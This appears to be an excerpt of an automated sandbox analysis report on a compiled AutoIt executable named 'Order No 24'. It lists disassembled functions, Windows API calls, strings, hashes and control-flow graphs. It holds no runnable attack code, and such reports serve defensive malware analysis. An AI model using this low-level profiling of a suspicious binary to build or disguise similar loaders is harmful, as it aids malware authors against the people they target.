                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0099DF0C
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0099DF1F
                                                                                                                                  • GetSystemInfo.KERNEL32(?,00A1DC38,?,?), ref: 0099DF29
                                                                                                                                  • GetSystemInfo.KERNEL32(?,00A1DC38,?,?), ref: 0099DF35
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3851250370-0
                                                                                                                                  • Opcode ID: 4b84ad5403354b707c038852881853740771f16003e24b0e221b74f95e6e6340
                                                                                                                                  • Instruction ID: a466e65408f8131aa8b927271b4ddcf02acd35d0042e1b3aafd9a8d264f2e13d
                                                                                                                                  • Opcode Fuzzy Hash: 4b84ad5403354b707c038852881853740771f16003e24b0e221b74f95e6e6340
                                                                                                                                  • Instruction Fuzzy Hash: B761C4B180A388DFCF15CFA898C12EDBFB86F69300B1949D9D8459F247C674C909CB65
                                                                                                                                  Function 0098406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1213 98406b-984083 CreateStreamOnHGlobal 1214 9840a3-9840a6 1213->1214 1215 984085-98409c FindResourceExW 1213->1215 1216 9f4f16-9f4f25 LoadResource 1215->1216 1217 9840a2 1215->1217 1216->1217 1218 9f4f2b-9f4f39 SizeofResource 1216->1218 1217->1214 1218->1217 1219 9f4f3f-9f4f4a LockResource 1218->1219 1219->1217 1220 9f4f50-9f4f6e 1219->1220 1220->1217
                                                                                                                                  APIs
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0098449E,?,?,00000000,00000001), ref: 0098407B
                                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0098449E,?,?,00000000,00000001), ref: 00984092
                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,0098449E,?,?,00000000,00000001,?,?,?,?,?,?,009841FB), ref: 009F4F1A
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,0098449E,?,?,00000000,00000001,?,?,?,?,?,?,009841FB), ref: 009F4F2F
                                                                                                                                  • LockResource.KERNEL32(0098449E,?,?,0098449E,?,?,00000000,00000001,?,?,?,?,?,?,009841FB,00000000), ref: 009F4F42
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                  • String ID: SCRIPT
                                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                                  • Opcode ID: 1b467a9c4092565056fabd2c1ff490bcd64d393878be4fb2e93988ec0e8fe7ef
                                                                                                                                  • Instruction ID: af0f14ed296a4577cbdafe69b1ce330bddeebf9f221bcb8657fd5c1eac2073ce
                                                                                                                                  • Opcode Fuzzy Hash: 1b467a9c4092565056fabd2c1ff490bcd64d393878be4fb2e93988ec0e8fe7ef
                                                                                                                                  • Instruction Fuzzy Hash: 49111871200705BFE7219BA5EC48F677BBDEFC9B51F10856CB602962A0DA61DC028A20
                                                                                                                                  Function 009C6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,009F2F49), ref: 009C6CB9
                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 009C6CCA
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009C6CDA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 48322524-0
                                                                                                                                  • Opcode ID: d0ce5754ba64837a593b57bda6ded81986b4d5dddd0d6a068782368dea5d4b34
                                                                                                                                  • Instruction ID: 0fc9a51198656abdd5c447e36c9af889ebc1a57deb83fa0739a7663af89a0024
                                                                                                                                  • Opcode Fuzzy Hash: d0ce5754ba64837a593b57bda6ded81986b4d5dddd0d6a068782368dea5d4b34
                                                                                                                                  • Instruction Fuzzy Hash: 33E0D832C1041457C210A7B8EC0D8EA376CDE05339F100709F5F1C11D0EB74D91145D6
                                                                                                                                  Function 00993B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 3728558374-2766056989
                                                                                                                                  • Opcode ID: 0a3113f26251b8924b6af9add4b2b0d2ffaa8a237099910e6d9c0c3481df7eea
                                                                                                                                  • Instruction ID: 948a8944ae3178231f5524ae66a2d434c057bc8949bfe702cc80ced60a3345ee
                                                                                                                                  • Opcode Fuzzy Hash: 0a3113f26251b8924b6af9add4b2b0d2ffaa8a237099910e6d9c0c3481df7eea
                                                                                                                                  • Instruction Fuzzy Hash: 4F72BE74E04209AFDF14DF98C481BBEB7B9EF88300F14C45AE919AB291D735AE45CB91
                                                                                                                                  Function 00993200 Relevance: 1.0, Instructions: 986COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3964851224-0
                                                                                                                                  • Opcode ID: 16b5e7e65ea895af6f3006f911ba63e869b256b72e5bb24982242153a30276ec
                                                                                                                                  • Instruction ID: 6af0c41b3411ad2064277d26fd32f1709f1bd40136946d4a4d522bb99d4e2bc9
                                                                                                                                  • Opcode Fuzzy Hash: 16b5e7e65ea895af6f3006f911ba63e869b256b72e5bb24982242153a30276ec
                                                                                                                                  • Instruction Fuzzy Hash: 4A9269706083419FDB24DF18C484B6ABBE5BF88308F14885DF99A8B3A2D775ED45CB52
                                                                                                                                  Function 0098E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098E959
                                                                                                                                  • timeGetTime.WINMM ref: 0098EBFA
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098ED2E
                                                                                                                                  • TranslateMessage.USER32(?), ref: 0098ED3F
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 0098ED4A
                                                                                                                                  • LockWindowUpdate.USER32(00000000), ref: 0098ED79
                                                                                                                                  • DestroyWindow.USER32 ref: 0098ED85
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0098ED9F
                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 009F5270
                                                                                                                                  • TranslateMessage.USER32(?), ref: 009F59F7
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 009F5A05
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009F5A19
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                  • API String ID: 2641332412-570651680
                                                                                                                                  • Opcode ID: cdce3b84ab78258c08bcca7f3442b5e5d5265471ed0a8fe5f98d02cbbec335e0
                                                                                                                                  • Instruction ID: ddbcdbccd4d9a57dcbd36e3f816cd8fd13babe584cfeecd3360aa48b91130e27
                                                                                                                                  • Opcode Fuzzy Hash: cdce3b84ab78258c08bcca7f3442b5e5d5265471ed0a8fe5f98d02cbbec335e0
                                                                                                                                  • Instruction Fuzzy Hash: 4562E270508344DFDB24EF64C895BAA77E8BF84304F04496DFA8A8B392DB75D849CB52
                                                                                                                                  Function 009B5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___createFile.LIBCMT ref: 009B5EC3
                                                                                                                                  • ___createFile.LIBCMT ref: 009B5F04
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 009B5F2D
                                                                                                                                  • __dosmaperr.LIBCMT ref: 009B5F34
                                                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 009B5F47
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 009B5F6A
                                                                                                                                  • __dosmaperr.LIBCMT ref: 009B5F73
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 009B5F7C
                                                                                                                                  • __set_osfhnd.LIBCMT ref: 009B5FAC
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 009B6016
                                                                                                                                  • __close_nolock.LIBCMT ref: 009B603C
                                                                                                                                  • __chsize_nolock.LIBCMT ref: 009B606C
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 009B607E
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 009B6176
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 009B618B
                                                                                                                                  • __close_nolock.LIBCMT ref: 009B61EB
                                                                                                                                    • Part of subcall function 009AEA9C: CloseHandle.KERNELBASE(00000000,00A2EEF4,00000000,?,009B6041,00A2EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009AEAEC
                                                                                                                                    • Part of subcall function 009AEA9C: GetLastError.KERNEL32(?,009B6041,00A2EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009AEAF6
                                                                                                                                    • Part of subcall function 009AEA9C: __free_osfhnd.LIBCMT ref: 009AEB03
                                                                                                                                    • Part of subcall function 009AEA9C: __dosmaperr.LIBCMT ref: 009AEB25
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 009B620D
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 009B6342
                                                                                                                                  • ___createFile.LIBCMT ref: 009B6361
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009B636E
                                                                                                                                  • __dosmaperr.LIBCMT ref: 009B6375
                                                                                                                                  • __free_osfhnd.LIBCMT ref: 009B6395
                                                                                                                                  • __invoke_watson.LIBCMT ref: 009B63C3
                                                                                                                                  • __wsopen_helper.LIBCMT ref: 009B63DD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 3896587723-2766056989
                                                                                                                                  • Opcode ID: c8be0323bad5e0f2d944b27f0abee1f2f893e24a0bb5c8a67abd077f33241adf
                                                                                                                                  • Instruction ID: f30e348cdd8ce608957533b3f117343ea6dde93db703560728912c43a01fb4df
                                                                                                                                  • Opcode Fuzzy Hash: c8be0323bad5e0f2d944b27f0abee1f2f893e24a0bb5c8a67abd077f33241adf
                                                                                                                                  • Instruction Fuzzy Hash: 092245719046099BEF299FA8DE45BFD7B75EB81330F294228E521DB2D2C3399D40CB91
                                                                                                                                  Function 009CFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • _wcscpy.LIBCMT ref: 009CFA96
                                                                                                                                  • _wcschr.LIBCMT ref: 009CFAA4
                                                                                                                                  • _wcscpy.LIBCMT ref: 009CFABB
                                                                                                                                  • _wcscat.LIBCMT ref: 009CFACA
                                                                                                                                  • _wcscat.LIBCMT ref: 009CFAE8
                                                                                                                                  • _wcscpy.LIBCMT ref: 009CFB09
                                                                                                                                  • __wsplitpath.LIBCMT ref: 009CFBE6
                                                                                                                                  • _wcscpy.LIBCMT ref: 009CFC0B
                                                                                                                                  • _wcscpy.LIBCMT ref: 009CFC1D
                                                                                                                                  • _wcscpy.LIBCMT ref: 009CFC32
                                                                                                                                  • _wcscat.LIBCMT ref: 009CFC47
                                                                                                                                  • _wcscat.LIBCMT ref: 009CFC59
                                                                                                                                  • _wcscat.LIBCMT ref: 009CFC6E
                                                                                                                                    • Part of subcall function 009CBFA4: _wcscmp.LIBCMT ref: 009CC03E
                                                                                                                                    • Part of subcall function 009CBFA4: __wsplitpath.LIBCMT ref: 009CC083
                                                                                                                                    • Part of subcall function 009CBFA4: _wcscpy.LIBCMT ref: 009CC096
                                                                                                                                    • Part of subcall function 009CBFA4: _wcscat.LIBCMT ref: 009CC0A9
                                                                                                                                    • Part of subcall function 009CBFA4: __wsplitpath.LIBCMT ref: 009CC0CE
                                                                                                                                    • Part of subcall function 009CBFA4: _wcscat.LIBCMT ref: 009CC0E4
                                                                                                                                    • Part of subcall function 009CBFA4: _wcscat.LIBCMT ref: 009CC0F7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                  • API String ID: 2955681530-2806939583
                                                                                                                                  • Opcode ID: 969787d3fbd415c1000169537b15406ac15b6cc227cb0504f44bc35888e2d830
                                                                                                                                  • Instruction ID: 30ffc2ad4dddda102de060fee24056e28e7111c151633335222ab6f32647a253
                                                                                                                                  • Opcode Fuzzy Hash: 969787d3fbd415c1000169537b15406ac15b6cc227cb0504f44bc35888e2d830
                                                                                                                                  • Instruction Fuzzy Hash: E191A172504705AFDB24EB54C851F9BB3E9BFD8310F04886DF99997292DB30EA44CB92
                                                                                                                                  Function 009CBFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009CBDB4: __time64.LIBCMT ref: 009CBDBE
                                                                                                                                    • Part of subcall function 00984517: _fseek.LIBCMT ref: 0098452F
                                                                                                                                  • __wsplitpath.LIBCMT ref: 009CC083
                                                                                                                                    • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
                                                                                                                                  • _wcscpy.LIBCMT ref: 009CC096
                                                                                                                                  • _wcscat.LIBCMT ref: 009CC0A9
                                                                                                                                  • __wsplitpath.LIBCMT ref: 009CC0CE
                                                                                                                                  • _wcscat.LIBCMT ref: 009CC0E4
                                                                                                                                  • _wcscat.LIBCMT ref: 009CC0F7
                                                                                                                                  • _wcscmp.LIBCMT ref: 009CC03E
                                                                                                                                    • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC65D
                                                                                                                                    • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC670
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009CC2A1
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009CC338
                                                                                                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009CC34E
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009CC35F
                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009CC371
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                  • String ID: p1#v`K$v
                                                                                                                                  • API String ID: 2378138488-1068180069
                                                                                                                                  • Opcode ID: 45e8ed4d0349bfcdf08e568b16878a597cec676798bb510da27e1192e165f3d6
                                                                                                                                  • Instruction ID: 56ce620847d8923a2e897ce4099b4554a9f4ffc8135927bcc88b3587c0448632
                                                                                                                                  • Opcode Fuzzy Hash: 45e8ed4d0349bfcdf08e568b16878a597cec676798bb510da27e1192e165f3d6
                                                                                                                                  • Instruction Fuzzy Hash: F2C10CB1E00219ABDF11DFA5DC81FDEBBBDAF89310F0040AAF609E6151DB719A448F61
                                                                                                                                  Function 00983F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00983F86
                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00983FB0
                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00983FC1
                                                                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00983FDE
                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00983FEE
                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00984004
                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00984013
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                                  • Opcode ID: cc3e46f20cdb868e5a4c0b138661f102123499bea2259dc99c636f87bf8230ee
                                                                                                                                  • Instruction ID: d009801ffee1aff6c344b19ddf33f75c3767d9f04e123eb7b059e843c3188095
                                                                                                                                  • Opcode Fuzzy Hash: cc3e46f20cdb868e5a4c0b138661f102123499bea2259dc99c636f87bf8230ee
                                                                                                                                  • Instruction Fuzzy Hash: 6C21C7B9900318AFDB10DFE4E889BCDBBB4FB49700F01461AF615A62A0D7B545868F91
                                                                                                                                  Function 00983742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 961 983742-983762 963 9837c2-9837c4 961->963 964 983764-983767 961->964 963->964 965 9837c6 963->965 966 9837c8 964->966 967 983769-983770 964->967 968 9837ab-9837b3 DefWindowProcW 965->968 969 9837ce-9837d1 966->969 970 9f1e00-9f1e2e call 982ff6 call 99e312 966->970 971 98382c-983834 PostQuitMessage 967->971 972 983776-98377b 967->972 973 9837b9-9837bf 968->973 974 9837d3-9837d4 969->974 975 9837f6-98381d SetTimer RegisterWindowMessageW 969->975 1004 9f1e33-9f1e3a 970->1004 979 9837f2-9837f4 971->979 977 9f1e88-9f1e9c call 9c4ddd 972->977 978 983781-983783 972->978 980 9837da-9837ed KillTimer call 983847 call 98390f 974->980 981 9f1da3-9f1da6 974->981 975->979 983 98381f-98382a CreatePopupMenu 975->983 977->979 995 9f1ea2 977->995 984 983789-98378e 978->984 985 983836-983840 call 99eb83 978->985 979->973 980->979 988 9f1ddc-9f1dfb MoveWindow 981->988 989 9f1da8-9f1daa 981->989 983->979 992 9f1e6d-9f1e74 984->992 993 983794-983799 984->993 996 983845 985->996 988->979 997 9f1dac-9f1daf 989->997 998 9f1dcb-9f1dd7 SetFocus 989->998 992->968 1000 9f1e7a-9f1e83 call 9ba5f3 992->1000 1002 9f1e58-9f1e68 call 9c55bd 993->1002 1003 98379f-9837a5 993->1003 995->968 996->979 997->1003 1005 9f1db5-9f1dc6 call 982ff6 997->1005 998->979 1000->968 1002->979 1003->968 1003->1004 1004->968 1009 9f1e40-9f1e53 call 983847 call 984ffc 1004->1009 1005->979 1009->968
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 009837B3
                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 009837DD
                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00983800
